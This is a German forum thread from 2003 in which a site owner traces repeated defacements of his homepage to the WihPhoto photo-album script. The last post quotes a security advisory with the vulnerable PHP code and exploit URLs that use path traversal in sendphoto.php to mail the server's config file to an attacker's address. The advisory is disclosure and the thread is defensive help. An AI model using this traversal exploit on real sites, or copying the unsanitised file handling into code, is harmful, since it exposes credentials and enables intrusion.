[HaBo]
| Internet Allgemein Flatrates, Webspace, Protokolle und alles rund ums Internet hier rein. |
Homepage gehacked
Diskussion: Homepage gehacked im Forum Internet Allgemein, in der Kategorie Web, Network & Multimedia Palace; Anzeige Hallo, seit ca. 2 Wochen wird meine Homepage ständig gehacked. Es wird die index.html ausgetauscht und auch teilweise die ...
 |
25.04.03, 19:45
| #1 (permalink) |
| Registriert seit: 25.04.03  Likes: 0 |  Homepage gehacked Anzeige Hallo, seit ca. 2 Wochen wird meine Homepage ständig gehacked. Es wird die index.html ausgetauscht und auch teilweise die Texte in meinem Fotoalbum (Wiphoto) geändert. Ein Hacker meinte, daß meine HP "Defaced" wurde. Was bedeutet das und wie kann ich mich davor schützen ??? Meine HP ist bei 1 & 1 gehostet. Bin für jede Hilfe sehr dankbar ! Gruß Michael |
|  |
|
25.04.03, 20:24
| #2 (permalink) |
| Registriert seit: 07.10.01 Likes: 0 |  Du kennst einen Hacker? kewl! "Defacen" wird das "hacken" von Websites genannt. WIe du dich dagegen schuetzt? Alles sicher machen, und auszerdem -wie es hier oft erwaehnt wird- ne mail an 1 & 1 schicken und denen dein Problem schildern. Viel Erfolg /*Edit: kurz noch ne Uebersetzung  deface - entstellen, verunstalten; ausstreichen defacement - Entstellung |
|
| |
| HaBOT | - Anzeige - |
|
|
25.04.03, 21:10
| #3 (permalink) |
| Themenstarter Registriert seit: 25.04.03 Likes: 0 | Alles sicher machen ist gut ! Die Frage ist nur: wie ??????? Von 1&1 kam nur der gute Tipp das Paßwort regelmäßig zu ändern. Das tue ich bereits, es hilft aber nicht. Meine HP wird trotzdem immer wieder geändert. |
|
| |
|
25.04.03, 23:00
| #4 (permalink) |
| Senior Member Registriert seit: 02.10.01 Likes: 1 | Vielleicht haste nen Trojaner auf deinem Rechner und der Bösewicht liest auf diese Art und Weise das neue Passwort immer aus. Anders ist das nicht zu erklären. |
|
| |
|
26.04.03, 00:30
| #5 (permalink) |
| root@yourmom ~ $   Registriert seit: 05.10.01 Likes: 2 | Wer hat noch Zugang zu deinem Rechner? Moe
__________________ In personal conversations with technical people, I call myself a hacker. But when I'm talking to journalists I just say "programmer" or something like that. Linus Torvalds Lunar Linux Xfce |
|
| |
|
26.04.03, 11:13
| #6 (permalink) |
| Themenstarter Registriert seit: 25.04.03 Likes: 0 | Der Rechner wird nur von mir benutzt. Mein PC hängt an einem DSL-Router mit Firewall. An dem Router ist noch ein zweiter PC angeschlossen. Die PC's sind aber nicht untereinander vernetzt, d.h. man kann nicht auf den anderen PC zugreifen. Michael |
|
| |
|
26.04.03, 17:52
| #7 (permalink) | |
| Träger des silbernen Seepferdchens   Registriert seit: 24.04.02  Likes: 9 | Zitat:
__________________ Diese Zeile ist reserviert für Clark Kent. | |
|
| |
|
26.04.03, 18:10
| #8 (permalink) |
| Themenstarter Registriert seit: 25.04.03 Likes: 0 | Aus meinen Logs konnte ich erkennen, daß die Angriffe von folgendem Rechner kommen müssen: dell.sstu.ru Auf diesen Seiten wurde der Hack veröffentlicht: www.mazafaka.ru und http://gipshack.ru Kann ich irgendwie verhindern, daß man von diesen Seiten auf meine kommt ? Michael |
|
| |
|
26.04.03, 18:43
| #9 (permalink) |
| Registriert seit: 02.10.01 Likes: 0 | also ich halte es für unwahrcheinlich das da jemand immer wieder dein aktuelles ftp pwd via trojaner von deine kiste holt. *YODA recht geb  *du sagtest das immer die index.html und ein teil im fotoalbum geändert wird das hört sich nach fehlern in scripten an welche php oder cgi sc ripte hast du den laufen ? |
|
| |
|
26.04.03, 21:01
| #10 (permalink) |
| Themenstarter Registriert seit: 25.04.03 Likes: 0 | Erst einmal ein großes "Dankeschön" an alle die mir helfen !!!!! Ich habe zur Zeit drei PHP-Scripte laufen: 1. Tellfriend.php Link an einen anderen per Mail senden. 2. Wiphoto (index.php) Ein Programm für Online-Fotoalben. 3. Licomail Bin leider ein totaler Anfänger was Scripte angeht. Ich habe Wiphoto in Verdacht, kann aber an meinem angepaßtem Script keine Unterschiede zum Original entdecken. Michael |
|
| |
|
27.04.03, 23:17
| #11 (permalink) |
| Themenstarter Registriert seit: 25.04.03 Likes: 0 | Habe Wiphoto jetzt gelöscht und seitdem keine Probleme mehr gehabt. Andere gahackte Seiten hatten auch Wiphoto installiert. Aber wie ist es ihnen möglich gewesen über die Wiphoto-Scripte meine HP zu ändern ? Kann mir jemand verraten, wie man Zugriffe über die Wiphoto-Scripte unterbinden kann ? Auf das Programm möchte ich eigentlich ungern verzichten, da ich bisher keine Alternative gefunden habe, um Fotoalben darzustellen. Michael |
|
| |
|
28.04.03, 01:01
| #12 (permalink) |
| Member of Honour  Registriert seit: 04.10.01  Likes: 42 | Ohne es zu kennen, nehme ich mal an, dass WibPhoto etwas schlampig bzw. durchsichtig programmiert ist!
__________________ << Wir leben bereits im morgigen Gestern, doch vom gestrigen Morgen sind wir noch weit entfernt. >> << Träume sind Schäume. Es liegt an dir ob du sie lebst oder ein Schaumschläger bist! >> << Erst wenn man beginnt zu implizieren, wird man merken, dass einem sowieso keiner richtig zuhört. >> |
|
| |
|
28.04.03, 21:38
| #13 (permalink) |
| Themenstarter Registriert seit: 25.04.03 Likes: 0 | Es liegt an der Sendphoto-Funktion von Wihphoto. Michael |
|
| |
|
29.08.03, 05:29
| #14 (permalink) |
| Registriert seit: 26.08.03 Likes: 0 | das würd ich jetzt aber auch gern mal genauer wissen... wie kann ein php-script dazu führen, daß die index.html "hackable" wird ? |
|
| |
|
29.08.03, 05:47
| #15 (permalink) |
| Member of Honour Registriert seit: 06.03.03 Likes: 3 | Code: WihPhoto (PHP) - All files from the hard disk can be send by mail Feb, 25 2003 - 16:14 contributed by: hx Informations : °°°°°°°°°°°°°° Version : 0.86-dev Website : http://www.wihsy.com problem : All files from the hard disk can be send by mail PHP Code/Location : °°°°°°°°°°°°°°°°°°° util/email.php : ------------------------------------------------------------------------ <? class CMailFile { var $subject; var $addr_to; var $text_body; var $text_encoded; var $mime_headers; var $mime_boundary = "--==================_846811060==_"; var $smtp_headers; function CMailFile($subject,$to,$from,$msg,$filename,$mimetype = "application/octet-stream", $mime_filename = false) { $this->subject = $subject; $this->addr_to = $to; $this->smtp_headers = $this->write_smtpheaders($from); $this->text_body = $this->write_body($msg); $this->text_encoded = $this->attach_file($filename,$mimetype,$mime_filename); $this->mime_headers = $this->write_mimeheaders($filename, $mime_filename); } function attach_file($filename,$mimetype,$mime_filename) { $encoded = $this->encode_file($filename); if ($mime_filename) $filename = $mime_filename; $out = "--" . $this->mime_boundary . "\n"; $out = $out . "Content-type: " . $mimetype . "; name=\"$filename\";\n"; $out = $out . "Content-Transfer-Encoding: base64\n"; $out = $out . "Content-disposition: attachment; filename=\"$filename\"\n\n"; $out = $out . $encoded . "\n"; $out = $out . "--" . $this->mime_boundary . "--" . "\n"; return $out; // added -- to notify email client attachment is done } function encode_file($sourcefile) { if (is_readable($sourcefile)) { $fd = fopen($sourcefile, "r"); $contents = fread($fd, filesize($sourcefile)); $encoded = my_chunk_split(base64_encode($contents)); fclose($fd); } return $encoded; } function sendfile() { $headers = $this->smtp_headers . $this->mime_headers; $message = $this->text_body . $this->text_encoded; mail($this->addr_to,$this->subject,$message,$headers); } [...] function write_mimeheaders($filename, $mime_filename) { if ($mime_filename) $filename = $mime_filename; $out = "MIME-version: 1.0\n"; $out = $out . "Content-type: multipart/mixed; "; $out = $out . "boundary=\"$this->mime_boundary\"\n"; $out = $out . "Content-transfer-encoding: 7BIT\n"; $out = $out . "X-attachments: $filename;\n\n"; return $out; } [...] } [...] ------------------------------------------------------------------------ sendphoto.php : ------------------------------------------------------------------------ include("util/email.php"); include("config.inc.php"); [...] if (!$filled) { print "<FORM METHOD=POST ACTION=sendphoto.php>\n"; print "<INPUT TYPE=hidden NAME=filled VALUE=1>\n"; print "<INPUT TYPE=hidden NAME=pic VALUE=$pic>\n"; print "<INPUT TYPE=hidden NAME=album VALUE="; print rawurlencode($album); print ">\n"; print "<center><p>$sendphoto_send_photo_to<br>"; print "<INPUT NAME=sendto></input></center>\n"; print "<p>\n"; print "<center><INPUT TYPE=submit VALUE=\"$sendphoto_button\"></center>\n"; print "</form>\n"; print "</body></html>\n"; } else { $message = "$sendphoto_message"; $album1 = rawurldecode($album); $filetoattach = "./$pix_base/$album1/$pic"; $mimetype = "image/jpeg"; $newmail = new CMailFile($subject,$sendto,$replyto,$message,$filetoattach,$mimetype); $newmail->sendfile(); print "$sendphoto_successful"; print "</body></html>\n"; } ?> ------------------------------------------------------------------------ Exploits : °°°°°°°°°° http://[target]/sendphoto.php?album=..&pic=config.inc.php or http://[target]/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1 where [E-MAIL] is the mailbox where http://[target]/config.inc.php will be sent. Patch : °°°°°°° A patch can be found on http://www.phpsecure.info . |
|
| |
|
| - Anzeige - | |
|
|
[HaBo] » Web, Network & Multimedia Palace » Internet Allgemein » Homepage gehacked
| Themen-Optionen | |
| Ansicht | |
Linear-Darstellung
| |
Ähnliche Themen | ||||
| Thema | Autor | Forum | Antworten | Letzter Beitrag |
| Homepage 4 me | User!?! | (Web-) Design und webbasierte Sprachen | 11 | 31.12.05 23:09 |
| Homepage | eMaykal | Internet Allgemein | 16 | 10.02.04 21:21 |
| IRC für Homepage | Cyberextension | Internet Allgemein | 7 | 10.06.03 20:10 |
